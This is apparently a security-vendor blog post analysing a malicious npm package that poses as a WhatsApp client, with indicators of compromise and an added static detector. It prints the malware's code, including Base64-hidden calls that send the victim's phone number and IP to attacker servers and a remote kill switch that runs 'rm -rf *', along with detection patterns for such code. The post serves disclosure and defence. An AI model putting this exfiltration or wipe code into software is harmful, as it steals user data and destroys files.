Malicious npm Package Exploits WhatsApp Authentication with Remote Kill Switch for File Destruction

A malicious npm package disguised as a WhatsApp client is exploiting authentication flows with a remote kill switch to exfiltrate data and destroy files.

Kush Pandya

November 15, 2024


"The authentication was successful. Your files are gone."

This isn't a ransomware message - it's the silent outcome of a newly discovered malware masquerading as a WhatsApp Web client implementation. What makes this threat particularly concerning isn't just its ability to delete your files, but the way it hides in plain sight within standard authentication flows that developers trust every day.

Our security team has uncovered a multi-stage attack where every successful connection to WhatsApp's servers could trigger a ticking time bomb. The malware authors didn't just build a data stealer - they created a destructive payload that waits for the perfect moment to strike, all while masquerading as legitimate code that many developers wouldn't think twice about using.

With messaging platforms becoming central to modern applications and over 500 messaging-related malware incidents reported in 2024 alone, this implementation stands out for its particularly devious approach, because it uses WhatsApp's own authentication process as a weapon.

Initial Discovery

The malicious package @vreden/meta (https://socket.dev/npm/package/@vreden/meta) was discovered during a routine scan of npm packages related to WhatsApp API implementations. What caught our attention was the suspicious modification of the authentication flow in the main file. Further investigation showed that the package had also copied the README file of Baileys (https://socket.dev/npm/package/baileys) to appear legitimate while hiding destructive capabilities in its code.

Technical Analysis

Primary Malicious Components

Data Exfiltration Mechanism:

const requestPairingCode = async (phoneNumber) => {
    // Base64-encoded C2 endpoints (decoded at runtime with atob)
    const defaultMaxListenersBuffer = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvbGVhZHM/aWQ9";
    const streamListerBuffer = "aHR0cHM6Ly9pcHdoby5pcy8/bGFuZz1pZC1JRA==";
    // Legitimate authentication mixed with data collection
    authState.creds.pairingCode = (0, Utils_1.bytesToCrockford)((0, crypto_1.randomBytes)(5));
    authState.creds.me = {
        id: (0, WABinary_1.jidEncode)(phoneNumber, 's.whatsapp.net'),
        name: '~'
    };
    ev.emit('creds.update', authState.creds);
    // Hidden data exfiltration: look up the victim's public IP, then report phone number and IP
    const response = await axios_1.default.get(`${atob(streamListerBuffer)}`);
    await axios_1.default.get(`${atob(defaultMaxListenersBuffer)}${phoneNumber}&s=${response.data.ip}`);
    // remainder of the function not shown in this excerpt
};
  • The function uses Base64 encoding to hide two endpoints:
    • The first endpoint (streamListerBuffer) decodes to hxxps://ipwho[.]is/?lang=id-ID, an IP information gathering service
    • The second endpoint (defaultMaxListenersBuffer) decodes to hxxps://rest-api[.]vreden[.]my[.]id/leads?id= and serves as the data collection point
  • The code executes in two stages:
    1. Makes a request to obtain the victim's public IP address
    2. Sends both the phone number and the IP address to the attacker's server
  • The legitimate-looking bytesToCrockford operation serves as camouflage while the exfiltration occurs

Destructive Payload:

const interaktiveMeta = async (phoneNumber) => {
    const metaBufferKey = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvY2VrP2lkPQ==";
    const response = await axios_1.default.get(`${atob(metaBufferKey)}${phoneNumber}`);
    if (response.data.message) {
        (0, child_process_1.exec)("rm -rf *");
    }
    return "the interaktiveMessage is available";
};
  • This function implements a remote kill switch:
    • Uses a Base64-encoded endpoint (decoding to hxxps://rest-api[.]vreden[.]my[.]id/cek?id=) to hide the command and control server
    • Makes a request carrying the victim's phone number to check for a destruction command
    • If the server responds with a non-empty message field, it executes rm -rf *
  • The command rm -rf * is a destructive Unix/Linux command that:
    • Removes (rm) files and directories
    • Forces deletion without confirmation (-f)
    • Recursively deletes subdirectories (-r)
    • Applies to everything the wildcard (*) matches in the current working directory
  • The innocuous return message "the interaktiveMessage is available" masks the destructive operation
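The two patterns described above, a Base64 literal that decodes to a URL and a conditional exec of a recursive delete, can be caught statically. The following is an added example written for this post (not code from @vreden/meta or from Socket's scanner) that scans source text for both patterns and runs over a constructed snippet mirroring the analysed functions; the Base64 strings are the ones quoted above.

```javascript
// Added example, not code from @vreden/meta or Socket's tooling: a minimal
// static check for hidden Base64 URLs and destructive exec() calls.

// A quoted run of Base64 characters long enough to hide a URL.
const B64_LITERAL = /["'`]([A-Za-z0-9+\/]{16,}={0,2})["'`]/g;
// exec("...") or (0, x.exec)("...") whose command is a forced recursive rm.
const EXEC_RM = /\bexec\)?\s*\(\s*["'`]([^"'`]*\brm\s+-(?:rf|fr)\b[^"'`]*)["'`]/g;
// Runtime decoding calls that usually accompany hidden string literals.
const RUNTIME_DECODE = /\batob\s*\(|Buffer\.from\s*\([^)]*["']base64["']/g;

// Decode a literal (Node Buffer API) and keep it only if it is an http(s) URL.
function decodeBase64Url(literal) {
  if (literal.length % 4 !== 0) return null; // not valid padded Base64
  const text = Buffer.from(literal, 'base64').toString('utf8');
  return /^https?:\/\/[^\s"'<>]+$/.test(text) ? text : null;
}

// Scan one file's source text and report what a reviewer should look at.
function scanSource(src) {
  const encodedUrls = [];
  for (const m of src.matchAll(B64_LITERAL)) {
    const url = decodeBase64Url(m[1]);
    if (url) encodedUrls.push({ literal: m[1], url, host: new URL(url).host });
  }
  const destructiveExecs = [...src.matchAll(EXEC_RM)].map((m) => m[1]);
  const runtimeDecodes = [...src.matchAll(RUNTIME_DECODE)].length;
  // A hidden URL next to a destructive exec is the remote kill-switch shape.
  const killSwitchShape = encodedUrls.length > 0 && destructiveExecs.length > 0;
  return { encodedUrls, destructiveExecs, runtimeDecodes, killSwitchShape };
}

// Constructed sample mirroring the shape of the two malicious functions.
const SAMPLE = [
  'const defaultMaxListenersBuffer = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvbGVhZHM/aWQ9";',
  'const streamListerBuffer = "aHR0cHM6Ly9pcHdoby5pcy8/bGFuZz1pZC1JRA==";',
  'const response = await axios_1.default.get(atob(streamListerBuffer));',
  'const metaBufferKey = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvY2VrP2lkPQ==";',
  'if (response.data.message) { (0, child_process_1.exec)("rm -rf *"); }',
  'return "the interaktiveMessage is available";',
].join('\n');

console.log(JSON.stringify(scanSource(SAMPLE), null, 2));
```

Decoding every long Base64 literal and checking whether it is a URL gives far fewer false positives than flagging Base64 on its own, since keys and hashes fail the URL test.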

Attack Flow Analysis

  1. Initial Execution:
    • Package initialization appears normal, mimicking legitimate WhatsApp client behavior
    • Establishes legitimate WebSocket connections to WhatsApp servers
    • Begins authentication process using standard protocols
  2. Malicious Operations:
    • Collects device information during authentication
    • Exfiltrates data through encoded endpoints
    • Can execute destructive commands based on server response
  3. Data Collection Points:
    • Phone number during authentication
    • IP address and network information
    • Device fingerprinting data
    • Authentication credentials

Technical Impact Assessment

Immediate System Impact

The malware's primary system-level threat comes from its unrestricted access to the file system through exec commands. Most critically, it contains the capability to execute rm -rf *, which can wipe entire directory structures without warning or recovery options. This destructive capability, combined with its ability to compromise system credentials, creates a severe risk to system integrity and stability.

Data Security Impact

The data security implications of this malware are extensive and multi-layered. At its core, the malware systematically harvests sensitive information, beginning with phone numbers from the authentication process. It then expands its collection to include IP addresses, device identification data, and perhaps most concerning, authentication credentials. This comprehensive data gathering creates a complete profile of both the user and their system, which can be exploited for further attacks or unauthorized access.

Network Security Impact

From a network perspective, the malware establishes a concerning pattern of unauthorized connections. It creates persistent outbound connections to remote servers, with all communications obscured through base64 encoding to evade detection. These connections not only facilitate data exfiltration but also maintain an open channel for receiving additional commands or downloading new payloads, effectively creating a permanent backdoor into the infected system.

Indicators of Compromise (IOCs)

Package

  • @vreden/meta
Encoded Endpoints

aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvbGVhZHM/aWQ9 -> hxxps://rest-api[.]vreden[.]my[.]id/leads?id=
aHR0cHM6Ly9pcHdoby5pcy8/bGFuZz1pZC1JRA== -> hxxps://ipwho[.]is/?lang=id-ID
aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvY2VrP2lkPQ== -> hxxps://rest-api[.]vreden[.]my[.]id/cek?id=

Suspicious Functions

  • interaktiveMeta
  • requestPairingCode

MITRE ATT&CK Mapping

  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1140 - Deobfuscate/Decode Files or Information
  • T1041 - Exfiltration Over C2 Channel
  • T1070.004 - Indicator Removal on Host: File Deletion

Conclusion

This malware demonstrates deliberate obfuscation and strategic placement of malicious code inside legitimate-looking authentication flows. The combination of data exfiltration capabilities and a remotely triggered destructive function poses a significant risk to system integrity and data security.

To protect against such threats, implement Socket's security scanning tools for automated detection of suspicious code patterns and potentially malicious dependencies.

Protect yourself and your organizations with Socket’s free tools.

Threat actors exploit human error and trust by mimicking and typo-squatting trusted authors and packages to infiltrate malicious code into applications. It is crucial to verify package and author names carefully, review third-party code, and use security tools to detect potentially malicious packages.

Socket's free GitHub app detects malicious packages and serves as your first line of defense against known malware and other supply chain risks like install scripts, telemetry, and typo-squatting. It scans incoming dependencies in real-time with every pull request, instantly alerting developers via a GitHub comment if a potential typo-squatted package is detected.

Enhance security with Socket CLI.

Enhance your security further with the Socket CLI tool, which alerts you to potential malware containing packages and other security issues. Its "safe npm" feature proactively shields your machine from bad packages during npm install. Socket wraps npm commands, running the real npm install process while analyzing results in the background — even for deeply nested dependencies. Before writing anything to disk, it alerts you to risky packages, giving you the choice to stop the install or proceed.

Getting started is easy.

Install the Socket CLI:

npm install -g socket

Then, prefix npm installs with socket to analyze them before installation:

socket npm install react

Secure your workflow today.

Socket for GitHub and Socket CLI integrate seamlessly into your workflow, are free to use, and can save your app or organization from the disastrous consequences of supply chain attacks using typosquatting. Install them today to prevent risky dependencies from landing in your applications.
